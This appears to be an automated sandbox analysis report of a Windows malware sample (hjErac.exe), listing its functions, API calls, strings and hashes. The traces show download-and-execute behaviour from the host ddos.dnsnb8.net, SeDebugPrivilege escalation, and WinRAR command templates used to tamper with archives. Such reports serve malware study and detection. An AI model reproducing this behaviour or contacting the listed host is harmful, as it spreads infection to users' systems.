rar, xrefs: 00CB2988
%s\, xrefs: 00CB293A

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-3007274656
Opcode ID: a1b6d3670362cc468d26b30dec4c152de35cdf3b96b51fd91363fe692745f3a0
Instruction ID: 62e255d6b4acc3b5bf7acd8dd77b1f9e949a4b0086c02ca8db40291a9ee3d707
Opcode Fuzzy Hash: a1b6d3670362cc468d26b30dec4c152de35cdf3b96b51fd91363fe692745f3a0
Instruction Fuzzy Hash: AD31F972D4436CBBDB20A765DC89FDE776C9F14750F040462F549A3081E6B4EBC49BA1

Function 00CB1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CB185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1878
Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1880
Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1890
Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1894

WinExec.KERNEL32(?,00000005), ref: 00CB10F1
lstrlen.KERNEL32(00CB4748), ref: 00CB10FA
wsprintfA.USER32 ref: 00CB112A
wsprintfA.USER32 ref: 00CB1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00CB115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00CB1169
Sleep.KERNEL32 ref: 00CB1179

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB1119
http://%s:%d/%s/%s, xrefs: 00CB10C2, 00CB1141
%s%.8X.exe, xrefs: 00CB1124
ddos.dnsnb8.net, xrefs: 00CB10C8, 00CB10CF, 00CB1140, 00CB1168
cj/, xrefs: 00CB1135

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3050893656
Opcode ID: ba97eeaccd4a3d1cd6fdd8d0d404c4dca1d377b6162b4b3e860736aef88ebcac
Instruction ID: 112df104d768da4babe29bad34f38212c5649bb87d5b25e76311fbe31f4c5e45
Opcode Fuzzy Hash: ba97eeaccd4a3d1cd6fdd8d0d404c4dca1d377b6162b4b3e860736aef88ebcac
Instruction Fuzzy Hash: F721AC71804248BEDB24EBA0EC58BEEBBBCAB01315F5501A5E900A3051D7749B84CF60

Function 00CB1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00CB164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00CB165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\hjErac.exe,00000104), ref: 00CB166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00CB16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00CB16BD

Part of subcall function 00CB139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB13BC
Part of subcall function 00CB139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00CB13DA
Part of subcall function 00CB139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00CB1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB16E5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB1644
C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB1662, 00CB1667, 00CB16DD
C:\Windows\system32, xrefs: 00CB1656
Documents and Settings, xrefs: 00CB1696

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\hjErac.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3585991123
Opcode ID: 33b1d8fc83e6ac6cdab0ce17e611d6eebda2605ef7653fb3d5892910d544de0d
Instruction ID: 617c4b22dc3e3e3f35aad708845b5b4ea54f0fcdc20d440eedee065b796e859a
Opcode Fuzzy Hash: 33b1d8fc83e6ac6cdab0ce17e611d6eebda2605ef7653fb3d5892910d544de0d
Instruction Fuzzy Hash: 1A11D371544264BBCF2077A4AD4DFDF3F6DEF15362F440211FA09A10A1CA708A40D7A1

Function 00CB1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00CB1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB1075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB108E

Strings

http://%s:%d/%s/%s, xrefs: 00CB1000
ddos.dnsnb8.net, xrefs: 00CB1026

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 35c02bc93f08a08e8f81fa77f5328348e7baaa7411d59b618edf9fd9dd66e7b9
Instruction ID: 9c5ed3734835a0639ab51ecd496c88458b9bcbde79251e722cb7610aeb6a635f
Opcode Fuzzy Hash: 35c02bc93f08a08e8f81fa77f5328348e7baaa7411d59b618edf9fd9dd66e7b9
Instruction Fuzzy Hash: AC0161B110429CBFE7307F60ACC8F6BBBACDF44799F054629F655A2090DA705E448B70

Function 00CB6076 Relevance: 10.9, APIs: 7, Instructions: 354
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00CB60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00CB60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00CB6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CB61A5

Memory Dump Source

Source File: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 56459611dcc68a450d6fd4b353399d5498a836db7a1a46d7100ec6b83298af6f
Instruction ID: 43167344db7e1ecc35dcc5b2b29da78f960f78aaa8dd2a8e54e0d0902d975a3a
Opcode Fuzzy Hash: 56459611dcc68a450d6fd4b353399d5498a836db7a1a46d7100ec6b83298af6f
Instruction Fuzzy Hash: 2CD1C1B26006499FEB308F58CC85BEE77E5FF05311F144528ED9A8B281E778AA40CB65

Function 00CB2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00CB2C57

Part of subcall function 00CB1973: PathFileExistsA.SHLWAPI(00CB4E5C,00000000,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1992
Part of subcall function 00CB1973: CreateFileA.KERNEL32(00CB4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CB19BA
Part of subcall function 00CB1973: Sleep.KERNEL32(00000064), ref: 00CB19C6
Part of subcall function 00CB1973: wsprintfA.USER32 ref: 00CB19EC
Part of subcall function 00CB1973: CopyFileA.KERNEL32(00CB4E5C,?,00000000), ref: 00CB1A00
Part of subcall function 00CB1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB1A1E
Part of subcall function 00CB1973: GetFileSize.KERNEL32(00CB4E5C,00000000), ref: 00CB1A2C
Part of subcall function 00CB1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00CB1A46
Part of subcall function 00CB1973: ReadFile.KERNEL32(00CB4E5C,00CB4E60,00000000,?,00000000), ref: 00CB1A65

CreateThread.KERNEL32(00000000,00000000,00CB2B8C,00000000,00000000,00000000), ref: 00CB2C99
WaitForMultipleObjects.KERNEL32(00000001,00CB16BA,00000001,000000FF,?,00CB16BA,00000000), ref: 00CB2CAC
VirtualFree.KERNEL32(00820000,00000000,00008000,C:\Users\user\AppData\Local\Temp\hjErac.exe,00CB4E5C,00CB4E60,?,00CB16BA,00000000), ref: 00CB2CC2

Strings

C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB2C69

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe
API String ID: 2042498389-2769337085
Opcode ID: 8fba16d4d96812dfcd241f61955455eaa37df72cced495362e34a21345582bcc
Instruction ID: e286f546d37e1f3e5cb3dbeedade709b2170d965a7061a6da24d3a020d396ba6
Opcode Fuzzy Hash: 8fba16d4d96812dfcd241f61955455eaa37df72cced495362e34a21345582bcc
Instruction Fuzzy Hash: 13018F717452647BE714ABA5AC1AFEFBF6CEF01B60F104220F915D61C2D6A0DA00C7E0

Function 00CB14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00CB1504
VirtualQuery.KERNEL32(00CB14E1,?,0000001C), ref: 00CB1525
ExitProcess.KERNEL32 ref: 00CB157A

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 99109afe691b68e3fd358dec28d3a0324f228724d2e0e2e44d350b708c0d4ecb
Instruction ID: 5e19c87be62d585aa1a9822ff27d2131199c3b4efb3361ebcd7ebf7b59764754
Opcode Fuzzy Hash: 99109afe691b68e3fd358dec28d3a0324f228724d2e0e2e44d350b708c0d4ecb
Instruction Fuzzy Hash: 38117C71A04214DFCB24EFB6E8A5BBE77BCEB94712F54422AFC12D3151D2308A45AB50

Function 00CB1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00CB1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00CB1947

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 9fceada4912258d22d292abe34c7ff31993fc58211858c741792306c08f4705d
Instruction ID: 8df195445f3ed297e96e7b2f1ac05957b057d153772636f5745ccf8d187c8069
Opcode Fuzzy Hash: 9fceada4912258d22d292abe34c7ff31993fc58211858c741792306c08f4705d
Instruction Fuzzy Hash: A9F06232600249ABDB30DE26DC14BEB7BACAF50361F54853AF926D10A0E730E745DBB0

Non-executed Functions

Function 00CB119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,?,?,00CB13EF), ref: 00CB11AB
OpenProcessToken.ADVAPI32(00000000,00000028,00CB13EF,?,?,?,?,?,?,00CB13EF), ref: 00CB11BB
AdjustTokenPrivileges.ADVAPI32(00CB13EF,00000000,?,00000010,00000000,00000000), ref: 00CB11EB
CloseHandle.KERNEL32(00CB13EF), ref: 00CB11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00CB13EF), ref: 00CB1203

Strings

C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB11A5

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe
API String ID: 75692138-2769337085
Opcode ID: ad8345e82e6061d9e62352c3694d7d9db50f0ee64692ca9c4cee23737750cc2c
Instruction ID: 5f2a96d08cb7e2cbf7aeceff69ccdd233e5d0db6d2cd783600033e1bdb5888ed
Opcode Fuzzy Hash: ad8345e82e6061d9e62352c3694d7d9db50f0ee64692ca9c4cee23737750cc2c
Instruction Fuzzy Hash: 8B01E4B5900249EFDB00EFE4DD89BAEBBB8FF04305F504569E606A2250D7759F449B60

Function 00CB139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00CB13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00CB1448

Part of subcall function 00CB119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,?,?,00CB13EF), ref: 00CB11AB
Part of subcall function 00CB119F: OpenProcessToken.ADVAPI32(00000000,00000028,00CB13EF,?,?,?,?,?,?,00CB13EF), ref: 00CB11BB
Part of subcall function 00CB119F: AdjustTokenPrivileges.ADVAPI32(00CB13EF,00000000,?,00000010,00000000,00000000), ref: 00CB11EB
Part of subcall function 00CB119F: CloseHandle.KERNEL32(00CB13EF), ref: 00CB11FA
Part of subcall function 00CB119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00CB13EF), ref: 00CB1203

Strings

C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB13A8
SeDebugPrivilege, xrefs: 00CB13D3

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe$SeDebugPrivilege
API String ID: 4123949106-3478962142
Opcode ID: 35d0a12d0f6649a38807665bf4a2e4f4f452057bf49e16b4814de8f6043e7219
Instruction ID: c04fffa931f249ed2c790b9f98a2654ce125f990cd450e301aa1785e027ed432
Opcode Fuzzy Hash: 35d0a12d0f6649a38807665bf4a2e4f4f452057bf49e16b4814de8f6043e7219
Instruction Fuzzy Hash: 73319271D40219EAEF20DBA6CC65FEFBBB8EB44704FA44169E914B2151E7309E49CF60

Function 00CB239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239
sleepfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strstr.MSVCRT ref: 00CB23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CB2464
GetFileSize.KERNEL32(00000000,00000000), ref: 00CB2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00CB24A8
memset.MSVCRT ref: 00CB24B9
strrchr.MSVCRT ref: 00CB24C9
wsprintfA.USER32 ref: 00CB24DE
strrchr.MSVCRT ref: 00CB24ED
memset.MSVCRT ref: 00CB24F2
memset.MSVCRT ref: 00CB2505
wsprintfA.USER32 ref: 00CB2524
Sleep.KERNEL32(000007D0), ref: 00CB2535
Sleep.KERNEL32(000007D0), ref: 00CB255D
memset.MSVCRT ref: 00CB256E
wsprintfA.USER32 ref: 00CB2585
memset.MSVCRT ref: 00CB25A6
wsprintfA.USER32 ref: 00CB25CA
Sleep.KERNEL32(000007D0), ref: 00CB25D0
Sleep.KERNEL32(000007D0,?,?), ref: 00CB25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CB25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00CB2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00CB2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00CB265B
SetEndOfFile.KERNEL32 ref: 00CB266D
CloseHandle.KERNEL32(00000000), ref: 00CB2676
RemoveDirectoryA.KERNEL32(?), ref: 00CB2681

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB23B1, 00CB23B6, 00CB24CD
-ibck, xrefs: 00CB25BA
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00CB25C4
%s%s, xrefs: 00CB24D8
%s\, xrefs: 00CB257F
%s X -ibck "%s" "%s\", xrefs: 00CB251E

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2169341206
Opcode ID: 3c04e264007e292eddb4a9a25359740c80037e1877e713aeebb9d45b0f0458b9
Instruction ID: 17a5c7eb35b7c56e681701be92882918f62830308ae8ab24ccfe00cc3a05682e
Opcode Fuzzy Hash: 3c04e264007e292eddb4a9a25359740c80037e1877e713aeebb9d45b0f0458b9
Instruction Fuzzy Hash: 078181B1508344ABD710AF64EC85FEF7BACEF88705F00061AFA94D21A1D774DA498B66

Function 00CB274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00CB2766
memset.MSVCRT ref: 00CB2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00CB2787
wsprintfA.USER32 ref: 00CB27AB

Part of subcall function 00CB185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1878
Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1880
Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1890
Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1894

wsprintfA.USER32 ref: 00CB27C6
CopyFileA.KERNEL32(?,00CB4C80,00000000), ref: 00CB27D4
wsprintfA.USER32 ref: 00CB27F4

Part of subcall function 00CB1973: PathFileExistsA.SHLWAPI(00CB4E5C,00000000,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1992
Part of subcall function 00CB1973: CreateFileA.KERNEL32(00CB4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CB19BA
Part of subcall function 00CB1973: Sleep.KERNEL32(00000064), ref: 00CB19C6
Part of subcall function 00CB1973: wsprintfA.USER32 ref: 00CB19EC
Part of subcall function 00CB1973: CopyFileA.KERNEL32(00CB4E5C,?,00000000), ref: 00CB1A00
Part of subcall function 00CB1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB1A1E
Part of subcall function 00CB1973: GetFileSize.KERNEL32(00CB4E5C,00000000), ref: 00CB1A2C
Part of subcall function 00CB1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00CB1A46
Part of subcall function 00CB1973: ReadFile.KERNEL32(00CB4E5C,00CB4E60,00000000,?,00000000), ref: 00CB1A65

DeleteFileA.KERNEL32(?,?,00CB4E54,00CB4E58), ref: 00CB281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00CB4E54,00CB4E58), ref: 00CB2832

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB27B6
c_31892.nls, xrefs: 00CB27DE
C:\Windows\system32, xrefs: 00CB27E3
%s%.8x.exe, xrefs: 00CB27BB
%s\%s, xrefs: 00CB27EE
%s%s, xrefs: 00CB27A5
\WinRAR\Rar.exe, xrefs: 00CB2793

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3961832207
Opcode ID: 7fde94a63b27b1792e888e041419aa9d734835d767999524a6f0241b49894c13
Instruction ID: 2f717a8f307bf0045728eed8d048228fca8a3e9e3fa9c8d4ad211fd2e8faeae8
Opcode Fuzzy Hash: 7fde94a63b27b1792e888e041419aa9d734835d767999524a6f0241b49894c13
Instruction Fuzzy Hash: CA2151B6D4026C7BEB10EBA4AC89FEB776CEB14744F4005B1B654E2042E670EF448AA1

Function 00CB1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1878
Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1880
Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1890
Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1894

wsprintfA.USER32 ref: 00CB15AA
wsprintfA.USER32 ref: 00CB15C6
lstrlen.KERNEL32(?), ref: 00CB15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00CB15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00CB1609
